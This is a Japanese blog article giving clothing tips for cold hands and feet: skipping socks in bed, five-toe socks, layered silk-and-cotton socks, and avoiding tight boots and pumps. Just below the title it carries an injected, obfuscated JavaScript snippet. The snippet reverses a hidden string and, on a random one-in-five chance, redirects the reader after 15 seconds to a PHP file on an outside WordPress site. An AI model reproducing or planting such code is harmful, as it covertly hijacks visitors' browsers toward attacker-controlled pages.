冷え性改善のための靴下&ファッション

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}top”>冷え性改善のための靴下&ファッション

冷え性を改善するためには、服装に注意することも大事です。
ここでは特に重要な靴下と、その他ファッションについて解説します。

寝るときの靴下はNG!

意外に思われるかもしれませんが、
寝るときに靴下を履くのは冷え性を悪化させる場合があります。

足先が冷たくなる末端冷え性は、血行が悪くつま先まで
血液がしっかりと流れていないために冷えてしまうという状態です。

ここにきつく締め付けるような靴下を履いてしまうと、
血管が圧迫されてさらに血液が流れづらくなってしまいます。

また、足の裏は寝ている間に非常に多くの汗をかきます。
靴下を履いていると汗で湿ってしまい、逆に熱を奪ってしまいます。

以上から、寝るときには靴下を履かない方が良いと言われています。

五本指靴下が効果的

ちょっと前までは「おじさんが履くもの」といったイメージのあった
五本指靴下ですが、現在ではその効果の高さから幅広い年代の方が利用しているようです。

五本指靴下を履くと五本の指それぞれを自由に動かすことができ、
指の間の刺激により血行が良くなると考えられています。

実際に、普通の靴下と比べて足の温度が上がったという実験結果もあるようですね。

重ね履き「冷え取り靴下」がブーム?

靴下を重ねて履く人も多いかと思いますが、最近では重ね履き専用の靴下も販売されています。
シルク→綿→シルク→綿といった形で交互に重ね履きするものが一般的なようです。

効果もかなりあるようですので、洗濯が苦ではないという方は試してみてはいかがでしょうか?

その他の冷え性を悪化させるファッション

以下のようなファッションは、足の血行を妨げてしまうので避けた方が良いと言われています。

足首を固定するブーツ
ストッキング+ハイヒール
先が細くなっているパンプス

お腹・首回りを温めましょう

冷え性の改善には、お腹・首回りを温めることも大切です。
腹巻やマフラーなどを活用して、お腹・首回りを冷やさないようにしましょう。

普段の服装はとても大切です!

就寝時に靴下を履くなど、冷え性に良いと思ってやっていたことが
逆効果だった、というのはよくあることです。
正しい知識を身につけて、冷え性を改善していきましょう。